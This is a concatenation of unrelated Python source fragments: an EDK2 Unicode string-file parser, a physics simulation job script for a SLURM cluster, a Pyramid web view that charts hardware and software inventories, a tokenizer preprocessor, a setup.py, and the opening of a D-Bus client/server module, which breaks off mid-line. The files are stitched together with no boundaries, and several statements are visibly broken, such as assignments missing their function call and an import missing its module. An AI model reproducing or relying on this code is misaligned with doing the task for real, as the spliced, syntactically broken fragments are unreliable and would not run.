EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, ExtraData=File.Path) if Line.find(u'"') > 0: EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, ExtraData=File.Path) StrName = Line.split()[0] + u' ' + Line.split()[1] if StrName: if StrName.split()[1] not in ExistStrNameList: ExistStrNameList.append(StrName.split()[1].strip()) elif StrName.split()[1] in [DT.TAB_INF_ABSTRACT, DT.TAB_INF_DESCRIPTION, \ DT.TAB_INF_BINARY_ABSTRACT, DT.TAB_INF_BINARY_DESCRIPTION, \ DT.TAB_DEC_PACKAGE_ABSTRACT, DT.TAB_DEC_PACKAGE_DESCRIPTION, \ DT.TAB_DEC_BINARY_ABSTRACT, DT.TAB_DEC_BINARY_DESCRIPTION]: EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, \ Message=ST.ERR_UNIPARSE_MULTI_ENTRY_EXIST % StrName.split()[1], \ ExtraData=File.Path) if IsIncludeFile: if StrName not in NewLines: NewLines.append((Line[:Line.find(u'#language')]).strip()) else: NewLines.append((Line[:Line.find(u'#language')]).strip()) NewLines.append((Line[Line.find(u'#language'):]).strip()) elif len(Line.split()) > 4 and Line.find(u'#language') > 0 and Line.find(u'"') > 0: if Line[Line.find(u'#language')-1] != u' ' or \ Line[Line.find(u'#language')+len(u'#language')] != u' ': EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, ExtraData=File.Path) if Line[Line.find(u'"')-1] != u' ': EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, ExtraData=File.Path) StrName = Line.split()[0] + u' ' + Line.split()[1] if StrName: if StrName.split()[1] not in ExistStrNameList: ExistStrNameList.append(StrName.split()[1].strip()) elif StrName.split()[1] in [DT.TAB_INF_ABSTRACT, DT.TAB_INF_DESCRIPTION, \ DT.TAB_INF_BINARY_ABSTRACT, DT.TAB_INF_BINARY_DESCRIPTION, \ DT.TAB_DEC_PACKAGE_ABSTRACT, DT.TAB_DEC_PACKAGE_DESCRIPTION, \ DT.TAB_DEC_BINARY_ABSTRACT, DT.TAB_DEC_BINARY_DESCRIPTION]: EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, \ Message=ST.ERR_UNIPARSE_MULTI_ENTRY_EXIST % StrName.split()[1], \ ExtraData=File.Path) if IsIncludeFile: if StrName not in NewLines: NewLines.append((Line[:Line.find(u'#language')]).strip()) else: NewLines.append((Line[:Line.find(u'#language')]).strip()) NewLines.append((Line[Line.find(u'#language'):Line.find(u'"')]).strip()) NewLines.append((Line[Line.find(u'"'):]).strip()) else: EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, ExtraData=File.Path) elif Line.startswith(u'#language'): if len(Line.split()) == 2: if IsIncludeFile: if StrName not in NewLines: NewLines.append(StrName) else: NewLines.append(StrName) NewLines.append(Line) elif len(Line.split()) > 2 and Line.find(u'"') > 0: if IsIncludeFile: if StrName not in NewLines: NewLines.append(StrName) else: NewLines.append(StrName) NewLines.append((Line[:Line.find(u'"')]).strip()) NewLines.append((Line[Line.find(u'"'):]).strip()) else: EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, ExtraData=File.Path) elif Line.startswith(u'"'): if u'#string' in Line or u'#language' in Line: EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, ExtraData=File.Path) NewLines.append(Line) else: print(Line) EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, ExtraData=File.Path) if StrName and not StrName.split()[1].startswith(u'STR_'): EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, \ Message=ST.ERR_UNIPARSE_STRNAME_FORMAT_ERROR % StrName.split()[1], \ ExtraData=File.Path) if StrName and not NewLines: EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, \ Message=ST.ERR_UNI_MISS_LANGENTRY % StrName, \ ExtraData=File.Path) # # Check Abstract, Description, BinaryAbstract and BinaryDescription order, # should be Abstract, Description, BinaryAbstract, BinaryDescription AbstractPosition = -1 DescriptionPosition = -1 BinaryAbstractPosition = -1 BinaryDescriptionPosition = -1 for StrName in ExistStrNameList: if DT.TAB_HEADER_ABSTRACT.upper() in StrName: if 'BINARY' in StrName: BinaryAbstractPosition = ExistStrNameList.index(StrName) else: AbstractPosition = ExistStrNameList.index(StrName) if DT.TAB_HEADER_DESCRIPTION.upper() in StrName: if 'BINARY' in StrName: BinaryDescriptionPosition = ExistStrNameList.index(StrName) else: DescriptionPosition = ExistStrNameList.index(StrName) OrderList = sorted([AbstractPosition, DescriptionPosition]) BinaryOrderList = sorted([BinaryAbstractPosition, BinaryDescriptionPosition]) Min = OrderList[0] Max = OrderList[1] BinaryMin = BinaryOrderList[0] BinaryMax = BinaryOrderList[1] if BinaryDescriptionPosition > -1: if not(BinaryDescriptionPosition == BinaryMax and BinaryAbstractPosition == BinaryMin and \ BinaryMax > Max): EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, \ Message=ST.ERR_UNIPARSE_ENTRY_ORDER_WRONG, \ ExtraData=File.Path) elif BinaryAbstractPosition > -1: if not(BinaryAbstractPosition > Max): EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, \ Message=ST.ERR_UNIPARSE_ENTRY_ORDER_WRONG, \ ExtraData=File.Path) if DescriptionPosition > -1: if not(DescriptionPosition == Max and AbstractPosition == Min and \ DescriptionPosition > AbstractPosition): EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, \ Message=ST.ERR_UNIPARSE_ENTRY_ORDER_WRONG, \ ExtraData=File.Path) if not self.UniFileHeader: EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, Message = ST.ERR_NO_SOURCE_HEADER, ExtraData=File.Path) return NewLines # # Load a .uni file # def LoadUniFile(self, File = None): if File is None: EdkLogger.Error("Unicode File Parser", ToolError.PARSER_ERROR, Message='No unicode file is given', ExtraData=File.Path) self.File = File # # Process special char in file # Lines = self.PreProcess(File) # # Get Unicode Information # for IndexI in range(len(Lines)): Line = Lines[IndexI] if (IndexI + 1) < len(Lines): SecondLine = Lines[IndexI + 1] if (IndexI + 2) < len(Lines): ThirdLine = Lines[IndexI + 2] # # Get Language def information # if Line.find(u'#langdef ') >= 0: self.GetLangDef(File, Line + u' ' + SecondLine) continue Name = '' Language = '' Value = '' CombineToken = False # # Get string def information format as below # # #string MY_STRING_1 # #language eng # "My first English string line 1" # "My first English string line 2" # #string MY_STRING_1 # #language spa # "Mi segunda secuencia 1" # "Mi segunda secuencia 2" # if Line.find(u'#string ') >= 0 and Line.find(u'#language ') < 0 and \ SecondLine.find(u'#string ') < 0 and SecondLine.find(u'#language ') >= 0 and \ ThirdLine.find(u'#string ') < 0 and ThirdLine.find(u'#language ') < 0: if Line.find('"') > 0 or SecondLine.find('"') > 0: EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, Message=ST.ERR_UNIPARSE_DBLQUOTE_UNMATCHED, ExtraData=File.Path) Name = Line[Line.find(u'#string ') + len(u'#string ') : ].strip(' ') Language = SecondLine[SecondLine.find(u'#language ') + len(u'#language ') : ].strip(' ') for IndexJ in range(IndexI + 2, len(Lines)): if Lines[IndexJ].find(u'#string ') < 0 and Lines[IndexJ].find(u'#language ') < 0 and \ Lines[IndexJ].strip().startswith(u'"') and Lines[IndexJ].strip().endswith(u'"'): if Lines[IndexJ][-2] == ' ': CombineToken = True if CombineToken: if Lines[IndexJ].strip()[1:-1].strip(): Value = Value + Lines[IndexJ].strip()[1:-1].rstrip() + ' ' else: Value = Value + Lines[IndexJ].strip()[1:-1] CombineToken = False else: Value = Value + Lines[IndexJ].strip()[1:-1] + '\r\n' else: IndexI = IndexJ break if Value.endswith('\r\n'): Value = Value[: Value.rfind('\r\n')] Language = GetLanguageCode(Language, self.IsCompatibleMode, self.File) self.AddStringToList(Name, Language, Value) continue # # Load multiple .uni files # def LoadUniFiles(self, FileList): if len(FileList) > 0: for File in FileList: FilePath = File.Path.strip() if FilePath.endswith('.uni') or FilePath.endswith('.UNI') or FilePath.endswith('.Uni'): self.LoadUniFile(File) # # Add a string to list # def AddStringToList(self, Name, Language, Value, Token = 0, Referenced = False, UseOtherLangDef = '', Index = -1): for LangNameItem in self.LanguageDef: if Language == LangNameItem[0]: break if Language not in self.OrderedStringList: self.OrderedStringList[Language] = [] self.OrderedStringDict[Language] = {} IsAdded = True if Name in self.OrderedStringDict[Language]: IsAdded = False if Value is not None: ItemIndexInList = self.OrderedStringDict[Language][Name] Item = self.OrderedStringList[Language][ItemIndexInList] Item.UpdateValue(Value) Item.UseOtherLangDef = '' if IsAdded: Token = len(self.OrderedStringList[Language]) if Index == -1: self.OrderedStringList[Language].append(StringDefClassObject(Name, Value, Referenced, Token, UseOtherLangDef)) self.OrderedStringDict[Language][Name] = Token for LangName in self.LanguageDef: # # New STRING token will be added into all language string lists. # so that the unique STRING identifier is reserved for all languages in the package list. # if LangName[0] != Language: if UseOtherLangDef != '': OtherLangDef = UseOtherLangDef else: OtherLangDef = Language self.OrderedStringList[LangName[0]].append(StringDefClassObject(Name, '', Referenced, Token, OtherLangDef)) self.OrderedStringDict[LangName[0]][Name] = len(self.OrderedStringList[LangName[0]]) - 1 else: self.OrderedStringList[Language].insert(Index, StringDefClassObject(Name, Value, Referenced, Token, UseOtherLangDef)) self.OrderedStringDict[Language][Name] = Index # # Set the string as referenced # def SetStringReferenced(self, Name): # # String stoken are added in the same order in all language string lists. # So, only update the status of string stoken in first language string list. # Lang = self.LanguageDef[0][0] if Name in self.OrderedStringDict[Lang]: ItemIndexInList = self.OrderedStringDict[Lang][Name] Item = self.OrderedStringList[Lang][ItemIndexInList] Item.Referenced = True # # Search the string in language definition by Name # def FindStringValue(self, Name, Lang): if Name in self.OrderedStringDict[Lang]: ItemIndexInList = self.OrderedStringDict[Lang][Name] return self.OrderedStringList[Lang][ItemIndexInList] return None # # Search the string in language definition by Token # def FindByToken(self, Token, Lang): for Item in self.OrderedStringList[Lang]: if Item.Token == Token: return Item return None # # Re-order strings and re-generate tokens # def ReToken(self): if len(self.LanguageDef) == 0: return None # # Retoken all language strings according to the status of string stoken in the first language string. # FirstLangName = self.LanguageDef[0][0] # Convert the OrderedStringList to be OrderedStringListByToken in order to faciliate future search by token for LangNameItem in self.LanguageDef: self.OrderedStringListByToken[LangNameItem[0]] = {} # # Use small token for all referred string stoken. # RefToken = 0 for Index in range (0, len (self.OrderedStringList[FirstLangName])): FirstLangItem = self.OrderedStringList[FirstLangName][Index] if FirstLangItem.Referenced == True: for LangNameItem in self.LanguageDef: LangName = LangNameItem[0] OtherLangItem = self.OrderedStringList[LangName][Index] OtherLangItem.Referenced = True OtherLangItem.Token = RefToken self.OrderedStringListByToken[LangName][OtherLangItem.Token] = OtherLangItem RefToken = RefToken + 1 # # Use big token for all unreferred string stoken. # UnRefToken = 0 for Index in range (0, len (self.OrderedStringList[FirstLangName])): FirstLangItem = self.OrderedStringList[FirstLangName][Index] if FirstLangItem.Referenced == False: for LangNameItem in self.LanguageDef: LangName = LangNameItem[0] OtherLangItem = self.OrderedStringList[LangName][Index] OtherLangItem.Token = RefToken + UnRefToken self.OrderedStringListByToken[LangName][OtherLangItem.Token] = OtherLangItem UnRefToken = UnRefToken + 1 # # Show the instance itself # def ShowMe(self): print(self.LanguageDef) #print self.OrderedStringList for Item in self.OrderedStringList: print(Item) for Member in self.OrderedStringList[Item]: print(str(Member)) # # Read content from '!include' UNI file # def ReadIncludeUNIfile(self, FilaPath): if self.File: pass if not os.path.exists(FilaPath) or not os.path.isfile(FilaPath): EdkLogger.Error("Unicode File Parser", ToolError.FILE_NOT_FOUND, ExtraData=FilaPath) try: FileIn =, mode='rb', encoding='utf_8').readlines() except UnicodeError as Xstr: FileIn =, mode='rb', encoding='utf_16').readlines() except UnicodeError: FileIn =, mode='rb', encoding='utf_16_le').readlines() except: EdkLogger.Error("Unicode File Parser", ToolError.FILE_OPEN_FAILURE, ExtraData=FilaPath) return FileIn
import numpy as np import pandas as pd import xarray as xr import Grid import pf_dynamic_cart import os import sys from timeit import default_timer as timer # import pf_static_cart if __name__ == "__main__": start = timer() # ---- INITIALIZE GRIDS ---- (Lx, Ly, Lz) = (21, 21, 21) (dx, dy, dz) = (0.375, 0.375, 0.375) xgrid = Grid.Grid('CARTESIAN_3D') xgrid.initArray('x', -Lx, Lx, dx); xgrid.initArray('y', -Ly, Ly, dy); xgrid.initArray('z', -Lz, Lz, dz) (Nx, Ny, Nz) = (len(xgrid.getArray('x')), len(xgrid.getArray('y')), len(xgrid.getArray('z'))) # print((Nx * Ny * Nz)**(1 / 3) * (0.1 / 21)) # print(3 * np.log10(2560 / 10)) kxfft = np.fft.fftfreq(Nx) * 2 * np.pi / dx; kyfft = np.fft.fftfreq(Nx) * 2 * np.pi / dy; kzfft = np.fft.fftfreq(Nx) * 2 * np.pi / dz kgrid = Grid.Grid('CARTESIAN_3D') kgrid.initArray_premade('kx', np.fft.fftshift(kxfft)); kgrid.initArray_premade('ky', np.fft.fftshift(kyfft)); kgrid.initArray_premade('kz', np.fft.fftshift(kzfft)) kx = kgrid.getArray('kx') tMax = 1000 dt = 10 # tMax = 100 # dt = 0.2 tgrid = np.arange(0, tMax + dt, dt) gParams = [xgrid, kgrid, tgrid] # NGridPoints = (2 * Lx / dx) * (2 * Ly / dy) * (2 * Lz / dz) NGridPoints = xgrid.size() kx = kgrid.getArray('kx'); ky = kgrid.getArray('ky'); kz = kgrid.getArray('kz') k_max = np.sqrt(np.max(kx)**2 + np.max(ky)**2 + np.max(kz)**2) print('datagen_qdynamics_cart_massRat') print('Total time steps: {0}'.format(tgrid.size)) print('UV cutoff: {0}'.format(k_max)) print('NGridPoints: {0}'.format(NGridPoints)) # Basic parameters # Toggle parameters toggleDict = {'Location': 'cluster', 'Dynamics': 'imaginary', 'Coupling': 'twophonon', 'Grid': 'cartesian'} # ---- SET PARAMS ---- mB = 1 n0 = 1 gBB = (4 * np.pi / mB) * 0.05 Params_List = [] # mI_Vals = np.array([1, 2, 5, 10]) # aIBi_Vals = np.array([-10.0, -5.0, -2.0]) # # P_Vals = np.array([0.1, 0.4, 0.8, 0.9, 1.0, 1.1, 1.2, 1.4, 1.6, 2.0, 2.4, 2.7, 3.0, 4.0, 5.0]) # P_Vals = np.array([3.2, 3.4, 3.6, 3.8, 3.9, 4.1, 4.2, 4.4, 4.6, 4.8, 5.2, 5.4, 5.6, 5.8, 6.0]) # for mI in mI_Vals: # for aIBi in aIBi_Vals: # for P in P_Vals: # sParams = [mI, mB, n0, gBB] # cParams = [P, aIBi] # if toggleDict['Location'] == 'home': # datapath = '/home/kis/Dropbox/VariationalResearch/HarvardOdyssey/genPol_data/NGridPoints_{:.2E}/massRatio={:.1f}'.format(NGridPoints, mI / mB) # elif toggleDict['Location'] == 'work': # datapath = '/media/kis/Storage/Dropbox/VariationalResearch/HarvardOdyssey/genPol_data/NGridPoints_{:.2E}/massRatio={:.1f}'.format(NGridPoints, mI / mB) # elif toggleDict['Location'] == 'cluster': # datapath = '/n/regal/demler_lab/kis/genPol_data/NGridPoints_{:.2E}/massRatio={:.1f}'.format(NGridPoints, mI / mB) # if toggleDict['Dynamics'] == 'real': # innerdatapath = datapath + '/redyn' # elif toggleDict['Dynamics'] == 'imaginary': # innerdatapath = datapath + '/imdyn' # if toggleDict['Grid'] == 'cartesian': # innerdatapath = innerdatapath + '_cart' # elif toggleDict['Grid'] == 'spherical': # innerdatapath = innerdatapath + '_spherical' # if toggleDict['Coupling'] == 'frohlich': # innerdatapath = innerdatapath + '_froh' # elif toggleDict['Coupling'] == 'twophonon': # innerdatapath = innerdatapath # Params_List.append([sParams, cParams, innerdatapath]) # redo (mI, P, aIBi) redo_Vals = [(2, 4.4, -5.0), (2, 4.6, -5.0), (2, 4.8, -5.0), (1, 3.2, -2.0), (1, 3.4, -2.0), (1, 3.6, -2.0), (1, 3.8, -2.0), (1, 3.9, -2.0), (1, 4.1, -5.0), (1, 4.1, -2.0), (1, 4.2, -5.0), (1, 4.2, -2.0), (1, 4.4, -5.0), (1, 4.6, -2.0), (1, 5.6, -10.0), (1, 5.8, -10.0), (1, 6.0, -10.0)] for tup in redo_Vals: (mI, P, aIBi) = tup sParams = [mI, mB, n0, gBB] cParams = [P, aIBi] if toggleDict['Location'] == 'home': datapath = '/home/kis/Dropbox/VariationalResearch/HarvardOdyssey/genPol_data/NGridPoints_{:.2E}/massRatio={:.1f}'.format(NGridPoints, mI / mB) elif toggleDict['Location'] == 'work': datapath = '/media/kis/Storage/Dropbox/VariationalResearch/HarvardOdyssey/genPol_data/NGridPoints_{:.2E}/massRatio={:.1f}'.format(NGridPoints, mI / mB) elif toggleDict['Location'] == 'cluster': datapath = '/n/regal/demler_lab/kis/genPol_data/NGridPoints_{:.2E}/massRatio={:.1f}'.format(NGridPoints, mI / mB) if toggleDict['Dynamics'] == 'real': innerdatapath = datapath + '/redyn' elif toggleDict['Dynamics'] == 'imaginary': innerdatapath = datapath + '/imdyn' if toggleDict['Grid'] == 'cartesian': innerdatapath = innerdatapath + '_cart' elif toggleDict['Grid'] == 'spherical': innerdatapath = innerdatapath + '_spherical' if toggleDict['Coupling'] == 'frohlich': innerdatapath = innerdatapath + '_froh' elif toggleDict['Coupling'] == 'twophonon': innerdatapath = innerdatapath Params_List.append([sParams, cParams, innerdatapath]) # # ---- COMPUTE DATA ON COMPUTER ---- # runstart = timer() # for ind, Params in enumerate(Params_List): # loopstart = timer() # [sParams, cParams, innerdatapath] = Params_List[ind] # [mI, mB, n0, gBB] = sParams # [P, aIBi] = cParams # dyncart_ds = pf_dynamic_cart.quenchDynamics_DataGeneration(cParams, gParams, sParams, toggleDict) # dyncart_ds.to_netcdf(innerdatapath + '/P_{:.3f}_aIBi_{:.2f}.nc'.format(P, aIBi)) # loopend = timer() # print('Index: {:d}, P: {:.2f}, aIBi: {:.2f} Time: {:.2f}'.format(ind, P, aIBi, loopend - loopstart)) # end = timer() # print('Total Time: {:.2f}'.format(end - runstart)) # ---- COMPUTE DATA ON CLUSTER ---- runstart = timer() taskCount = int(os.getenv('SLURM_ARRAY_TASK_COUNT')) taskID = int(os.getenv('SLURM_ARRAY_TASK_ID')) if(taskCount > len(Params_List)): print('ERROR: TASK COUNT MISMATCH') P = float('nan') aIBi = float('nan') sys.exit() else: [sParams, cParams, innerdatapath] = Params_List[taskID] [mI, mB, n0, gBB] = sParams [P, aIBi] = cParams dyncart_ds = pf_dynamic_cart.quenchDynamics_DataGeneration(cParams, gParams, sParams, toggleDict) dyncart_ds.to_netcdf(innerdatapath + '/P_{:.3f}_aIBi_{:.2f}.nc'.format(P, aIBi)) end = timer() print('Task ID: {:d}, P: {:.2f}, aIBi: {:.2f} Time: {:.2f}'.format(taskID, P, aIBi, end - runstart))
__author__ = 'adley' import requests import json import random from wscacicneo.utils.utils import Utils from pyramid.httpexceptions import HTTPFound from wscacicneo.model import config_reports from import NullDocument from pyramid.session import check_csrf_token from import SearchOrgao class Graficos(): def __init__(self, request): """ Método construtor :param request: Requisição """ self.request = request self.usuario_autenticado = Utils.retorna_usuario_autenticado( self.request.session.get('userid')) def graficos_orgao(self): if 'attr' in self.request.matchdict.keys(): attr = self.request.matchdict['attr'] else: attr = 'softwarelist' orgao = self.request.matchdict['nm_orgao'] data = dict() if orgao != 'todos-orgaos': if attr not in ['softwarelist','todos']: return self.graficos(orgao = orgao) elif attr == 'todos': for attrib in ['win32_physicalmemory', 'win32_bios', 'win32_diskdrive', 'operatingsystem', 'win32_processor']: data[attrib] = self.graficos(attr=attrib)['data'] data['softwarelist'] = self.graficos_software(view_type='detailed')['data'] else: return self.graficos_software(orgao) else: search = SearchOrgao() orgaos = [org.nome for org in search.list_by_name()] for org in orgaos: if attr != 'softwarelist': data[org] = self.graficos(orgao = org)['data'] else: data[org] = self.graficos_software(org)['data'] title_chart = '' # Define o nome do gráfico baseado no "attr" if attr == "win32_processor": title_chart = "Gráfico de Processadores" elif attr == "win32_diskdrive": title_chart = "Gráfico de HD" elif attr == "win32_bios": title_chart = "Gráfico de BIOS" elif attr == "win32_physicalmemory": title_chart = "Gráfico de Memória" elif attr == "operatingsystem": title_chart = "Gráfico de Sistemas Operacionais" elif attr == "softwarelist": title_chart = "Gráfico de Softwares" elif attr != 'todos': title_chart = "Gráfico de "+attr return {"data": data, "usuario_autenticado": self.usuario_autenticado, "title_chart": title_chart, "orgao_nm": orgao, "attr": attr } def graficos(self, orgao=None, attr=None): # Define o nome do gráfico baseado no "attr" if attr is None: attr = self.request.matchdict['attr'] if attr == "win32_processor": title_chart = "Gráfico de Processadores" elif attr == "win32_diskdrive": title_chart = "Gráfico de HD" elif attr == "win32_bios": title_chart = "Gráfico de BIOS" elif attr == "win32_physicalmemory": title_chart = "Gráfico de Memória" elif attr == "operatingsystem": title_chart = "Gráfico de Sistemas Operacionais" else: title_chart = "Gráfico de "+attr if orgao is None: orgao_nm = self.request.matchdict['nm_orgao'] else: orgao_nm = orgao nm_orgao = Utils.format_name(orgao_nm) reports_config = config_reports.ConfReports(nm_orgao) get_base = reports_config.get_attribute(attr) results = get_base.results data = [] list_of_numbers = [] data.append(['Item', 'Quantidade']) # color_list = ["#8B0000", "#191970", "#2F4F4F", "#006400", "#808000", # "#696969", "#B8860B", "#FF8C00", "#2E8B57", "#228B22"] # chosen_color = 0 for elm in results: if isinstance(elm, NullDocument): continue parent = getattr(elm, attr) item = getattr(parent, attr + '_item') amount = getattr(parent, attr + '_amount') data.append([item, int(amount)]) list_of_numbers.append([int(amount)]) # Antigo código para o Charts JS # data.append({"label": item, "data": int(amount), "color": color_list[chosen_color]}) # chosen_color += 1 # if chosen_color >= len(color_list): # chosen_color = 0 # if attr == "software": # max_num = Utils.getMaxOfList(list_of_numbers) return {"data": data, "usuario_autenticado": self.usuario_autenticado, "title_chart": title_chart, "orgao_nm": orgao_nm, "attr": attr } def graficos_software(self, orgao=None, view_type = None): attr = 'softwarelist' title_chart = "Gráfico de Softwares" if view_type is None: view_type = self.request.matchdict['view_type'] if orgao is None: orgao_nm = self.request.matchdict['nm_orgao'] else: orgao_nm = orgao nm_orgao = Utils.format_name(orgao_nm) reports_config = config_reports.ConfReports(nm_orgao) get_base = reports_config.get_attribute(attr) results = get_base.results data = [] list_of_numbers = [] data.append(['Item', 'Quantidade']) # color_list = ["#8B0000", "#191970", "#2F4F4F", "#006400", "#808000", # "#696969", "#B8860B", "#FF8C00", "#2E8B57", "#228B22"] # chosen_color = 0 for elm in results: if isinstance(elm, NullDocument): continue parent = getattr(elm, attr) item = getattr(parent, attr + '_item') amount = getattr(parent, attr + '_amount') data.append([item, int(amount)]) list_of_numbers.append([int(amount)]) # Antigo código para o Charts JS # data.append({"label": item, "data": int(amount), "color": color_list[chosen_color]}) # chosen_color += 1 # if chosen_color >= len(color_list): # chosen_color = 0 if view_type == 'simple': data_dict = dict() data.pop(0) for a in data: data_dict[a[0]]= a[1] data_dict = Utils.group_data(data_dict) data=list() data.append(['Item', 'Quantidade']) for a in data_dict.keys(): data.append([a, int(data_dict[a])]) #if attr == "software": #max_num = Utils.getMaxOfList(list_of_numbers) return {"data": data, "usuario_autenticado": self.usuario_autenticado, "title_chart": title_chart, "orgao_nm": orgao_nm, "attr": attr }
class Preprocessor(object): __tokenizer = None __steps = [] def __init__(self, tokenizer, steps): self.__tokenizer = tokenizer self.__steps = steps def processText(self, comment): tokens = self.__tokenizer.tokenize(comment) tokenTuple = [(token, position) for position, token in enumerate(tokens)] ###### which way is faster? for step in self.__steps: tokenTuple = step.processAll(tokenTuple) ###### """ pTokenTuple = [] for token, position in tokenTuple: pT = (token, position) for step in self.__steps: pT = step.process(pT) if pT: pTokenTuple.append(pT) tokenTuple = pTokenTuple """ ###### which way is faster? ## doesn't make a huge difference: """ ncalls tottime percall cumtime percall filename:lineno(function) first one: 81098 0.342 0.000 114.429 0.001 /vagrant/cse/lang/ 81098 0.057 0.000 65.668 0.001 /vagrant/cse/lang/ compared to second one: 81098 2.708 0.000 119.330 0.001 /vagrant/cse/lang/ 2955756 1.275 0.000 67.069 0.000 /vagrant/cse/lang/ --> only about 5 seconds difference in cumulative execution time for 81098 calls """ return tokenTuple
#!/usr/bin/env python from __future__ import with_statement import os from setuptools import setup readme = '' if os.path.exists('README.rst'): readme = 'README.rst' with open(readme) as f: long_description = setup( name='stacktracer', version='0.1.2', author='messense', author_email='', url='', keywords='stack, tracer, multi-threaded, threading', description='Stack tracer for multi-threaded applications', long_description=long_description, py_modules=['stacktracer'], install_requires=[ 'pygments', ], include_package_data=True, classifiers=[ 'Development Status :: 4 - Beta', 'License :: OSI Approved :: MIT License', 'Operating System :: MacOS', 'Operating System :: POSIX', 'Operating System :: POSIX :: Linux', 'Programming Language :: Python', 'Programming Language :: Python :: Implementation :: CPython', 'Intended Audience :: Developers', 'Topic :: Software Development :: Libraries', 'Topic :: Software Development :: Libraries :: Python Modules', 'Topic :: Utilities', ], )
# # This file is part of Gruvi. Gruvi is free software available under the # terms of the MIT license. See the file "LICENSE" that was provided # together with this source file for the licensing terms. # # Copyright (c) 2012-2017 the Gruvi authors. See the file "AUTHORS" for a # complete list. """ The :mod:`gruvi.dbus` module implements a D-BUS client and server. The implementation uses parts of the `txdbus <>`_ project. A cut down copy of txdbus, containing only those parts needed by Gruvi, is available as ``gruvi.txdbus``. You need this if you are providing a message handler (see below). Both a client and a server/bus-side implementation are provided. The bus-side implementation is very bare bones and apart from the "Hello" message it does not implement any of the "org.freedestkop.DBus" interface. It also does not implement any message routing. The server side is provided mostly for testing purposes (but it could serve as the basis for a real D-BUS server). The client side of a D-BUS connection is implemented by :class:`DbusClient` and the server/bus-side by :class:`DbusServer`. Both implement a procedural interface. Messages can be send using e.g. :meth:`DbusClient.send_message` or :meth:`DbusClient.call_method`. An object-oriented interface that represents D-BUS objects as Python objects, like the one txdbus provides, is currently not available. The procedural interface can be used as a basis for your own object-oriented interface though. To receive notifications or to respond to method calls, you need to provide a *message handler* to the client or the server constructor. The signature of the message handler is: ``message_handler(message, protocol)``. Here, the *message* argument is an instance of ``gruvi.txdbus.DbusMessages``, and the *protocol* will be the :class:`DbusProtocol` instance for the current connection. Message handlers runs in their own fiber, which allows them to call into switchpoints. There is one fiber for every connection. Usage example:: client = gruvi.DbusClient() client.connect('session') result = client.call_method('org.freedesktop.DBus', '/org/freedesktop/DBus', 'org.freedesktop.DBus', 'ListNames') for name in result[0]: print('Name: {}'.format(name)) """ from __future__ import absolute_import, print_function import os import struct import binascii import codecs import functools import six import pyuv from . import compat from .hub import switchpoint, switch_back from .util import delegate_method from .sync import Event from .transports import TransportError from .protocols import ProtocolError, MessageProtocol from .stream import Stream from .endpoints import Client, Server from .address import saddr from .vendor import txdbus __all__ = ['DbusError', 'DbusMethodCallError', 'DbusProtocol', 'DbusClient', 'DbusServer'] class DbusError(ProtocolError): """Exception that is raised in case of D-BUS protocol errors.""" class DbusMethodCallError(DbusError): """Exception that is raised when a error reply is received for a D-BUS method call.""" def __init__(self, method, reply): message = 'error calling {!r} method ({})'.format(method, reply.error_name) super(DbusMethodCallError, self).__init__(message) self._error = reply.error_name self._args = tuple(reply.body) if reply.body else () @property def error(self): return self._error @property def args(self): return self._args def parse_dbus_address(address): """Parse a D-BUS address string into a list of addresses.""" if address == 'session': address = os.environ.get('DBUS_SESSION_BUS_ADDRESS') if not address: raise ValueError('$DBUS_SESSION_BUS_ADDRESS not set') elif address == 'system': address = os.environ.get('DBUS_SYSTEM_BUS_ADDRESS', 'unix:path=/var/run/dbus/system_bus_socket') addresses = [] for addr in address.split(';'): p1 = addr.find(':') if p1 == -1: raise ValueError('illegal address string: {}'.format(addr)) kind = addr[:p1] args = dict((kv.split('=') for kv in addr[p1+1:].split(','))) if kind == 'unix': if 'path' in args: addr = args['path'] elif 'abstract' in args: addr = '\0' + args['abstract'] else: raise ValueError('require "path" or "abstract" for unix') elif kind == 'tcp': if 'host' not in args or 'port' not in args: raise ValueError('require "host" and "port" for tcp') addr = (args['host'], int(args['port'])) else: raise ValueError('unknown transport: {}'.format(kind)) addresses.append(addr) return addresses class TxdbusAuthenticator(object): """A adapter to use the txdbus client and server authenticators with our transports and protocols.""" # For testing, cookie_dir is set to a temporary path. Otherwise, txdbus # uses ~/.dbus-keyrings as specified in the spec. cookie_dir = None def __init__(self, transport, server_side, server_guid=None): self._transport = transport self._server_side = server_side if self._server_side: self._authenticator = txdbus.BusAuthenticator(server_guid) self._authenticator.authenticators['DBUS_COOKIE_SHA1'].keyring_dir = self.cookie_dir else: self._authenticator = txdbus.ClientAuthenticator() self._authenticator.cookie_dir = self.cookie_dir self._authenticator.beginAuthentication(self) def sendAuthMessage(self, message): # Called by the txdbus authenticators message = message.encode('ascii') + b'\r\n' self._transport.write(message) @property def _unix_creds(self): # Used by txdbus.BusExternalAuthenticator return self._transport.get_extra_info('unix_creds') def handleAuthMessage(self, line): # Called by our protocol self._authenticator.handleAuthMessage(line) def authenticationSucceeded(self): """Return whether the authentication succeeded.""" return self._authenticator.authenticationSucceeded() def getMechanismName(self): """Return the authentication mechanism name.""" if self._server_side: mech = self._authenticator.current_mech return mech.getMechanismName() if mech else None else: return getattr(self._authenticator, 'authMech', None) def getUserName(self): """Return the authenticated user name (server side).""" if not self._server_side: return mech = self._authenticator.current_mech return mech.getUserName() if mech else None def getGUID(self): """Return the GUID of the authenticated server.""" return self._authenticator.getGUID() def parse_dbus_header(header): """Parse a D-BUS header. Return the message size.""" if six.indexbytes(header, 0) == ord('l'): endian = '<' elif six.indexbytes(header, 0) == ord('B'): endian = '>' else: raise ValueError('illegal endianness') if not 1 <= six.indexbytes(header, 1) <= 4: raise ValueError('illegel message 